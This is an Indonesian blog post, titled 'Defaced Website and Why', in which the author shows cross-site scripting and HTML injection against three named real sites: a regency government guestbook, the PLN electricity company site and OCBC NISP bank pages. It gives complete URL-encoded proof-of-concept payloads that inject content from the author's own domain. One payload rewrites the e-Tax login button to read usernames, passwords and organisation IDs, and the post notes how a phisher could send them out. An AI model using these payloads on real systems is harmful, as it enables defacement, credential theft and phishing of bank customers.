Defaced Website and Why

                                                                               1. Website Kabupaten Sidoarjo

TML Injection

Celah pertama yang saya bahas ini pasti sudah sering Anda temui. Target exploitasi celah ini adalah layanan Buku Tamu sidoarjokab.go.id. Saya memasukkan code HTML berupa tag <h1> pada form Buku Tamu:

Injeksi code HTML pada Buku Tamu

Hasilnya, input saya tidak disanitasi sehingga identitas dan komentar saya tampil dalam ukuran heading 1:

Hasil Injeksi code HTML pada Buku Tamu

Saya kemudian mencoba memasukkan code JavaScript pada Buku Tamu:

Injeksi code JavaScript pada Buku Tamu

Dan ternyata, code JavaScript saya dieksekusi:

Hasil Injeksi code JavaScript pada Buku Tamu

Bisa Anda bayangkan jika ada orang jahat yang menanam code JavaScript berbahaya yang dapat mencuri informasi sensitif user (cookies, csrf, etc..) di halaman ini. Dari sini kita bisa melihat adanya 2 celah keamanan pada Buku Tamu:

1. Tidak ada captha untuk melindungi buku tamu dari SPAMMER;
2. Tidak adanya sanitasi input dan output untuk mencegah orang jahat menginjeksikan malicious script;

2. Website PLN

PT. PLN (Persero) Website XSSED by SPYRO-KiD

POC:

1

http://www.pln.co.id/kontak-kami/telusur.php?nokeluhan=%22%20style=%22display:none%22%3E%3C/iframe%3E%3Cp%20align=%22center%22%3E%3Ca%20href=%22http://www.spyrozone.net%22%20target=%22_blank%22%3E%3Cimg%20src=%22http://www.spyrozone.net/playground/xssedbyspyrozone.net.png%22%20border=%220%22%3E%3C/a%3E%3C/p%3E%3Ciframe%20style=%22display:none%22%3E

//E.O.F

3. Website OSBC

Tidak bisa dipungkiri lagi dan telah berulang kali terbukti bahwa Website Bank yang memiliki celah XSS sangat rawan untuk menjadi target penipuan. Senin pagi kemarin saya mendapati 2 celah XSS pada portal Bank OCBC NISP, yaitu pada website utama dan pada aplikasi e-Tax OCBC NISP.

XSS Pada OCBCNISP-DOT-COM

POC:

Search Engine:

1

http://www.ocbcnisp.com/?opt=search&search=%22%3E%3C/head%3E%3Cbody%3E%3Ccenter%3E%3Ca%20href=%22http://www.spyrozone.net/%22%3E%3Cimg%20border=%220%22%20src=%22http://www.spyrozone.net/playground/xssedbyspyrozone.net.png%22%3E%3C/a%3E%3Cbr%3E%3Ciframe%20width=800%20height=600%20src=http://www.spyrozone.net%3E%3C/iframe%3E%3C/center%3E%3C/body%3E%3Cnoscript%3E&x=0&y=0&lang=1

Pencarian ATM:

1

http://www.ocbcnisp.com/?opt=atm&cty=%22%3E%3C/head%3E%3Cbody%3E%3Ccenter%3E%3Ca%20href=%22http://www.spyrozone.net/%22%3E%3Cimg%20border=%220%22%20src=%22http://www.spyrozone.net/playground/xssedbyspyrozone.net.png%22%3E%3C/a%3E%3Cbr%3E%3Ciframe%20width=800%20height=600%20src=http://www.spyrozone.net%3E%3C/iframe%3E%3C/center%3E%3C/body%3E%3Cnoscript%3E&lang=2

Hasil:

Bank OCBC NISP Website Vulnerable to XSS

XSS Pada Aplikasi e-Tax

POC:

1

http://etax.ocbcnisp.com/module.asp?module=1&error=%3C/div%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%20height=%2269%22%20colspan=%222%22%3E%3Cdiv%20align=%22center%22%3E%3Cinput%20name=%22Login%22%20type=%22button%22%20%20value=%22Login%22%20onClick=%22alert%28%27Info%20dari%20form%20Login%5Cn--------------------------------------------%5CnUsername:%20%27%2Bdocument.getElementsByName%28%27UserID%27%29[0].value%2B%27%5CnPassword:%20%27%2Bdocument.getElementsByName%28%27Password%27%29[0].value%2B%27%5CnOrganisation%20ID:%20%27%2Bdocument.getElementsByName%28%27orid%27%29[0].value%2B%27%5Cn%5CnInfo%20diatas%20telah%20terkirim%20ke%20server%20WWW.SPYROZONE.NET%27%29;%22%3E%3C/td%3E%3C/tr%3E%3C/table%3E%3C/form%3E%3C/div%3E%3Cnoscript%3E

Hasil:

Isikan username, password & ID organisani, kemudian klik tombol [Login].

Celah XSS Pada Aplikasi e-tax OCBC NISP

Melalui XSS, saya mengganti tombol submit form menjadi tombol yang akan mengambil data pada form, lalu menampilkannya di layar.

Data korban dikirim ke server lain

Phisher bisa mengganti fungsi saya menjadi fungsi untuk mengirimkan data-data tersebut ke servernya untuk menampung username dan password korban.

Oleh Spyro.net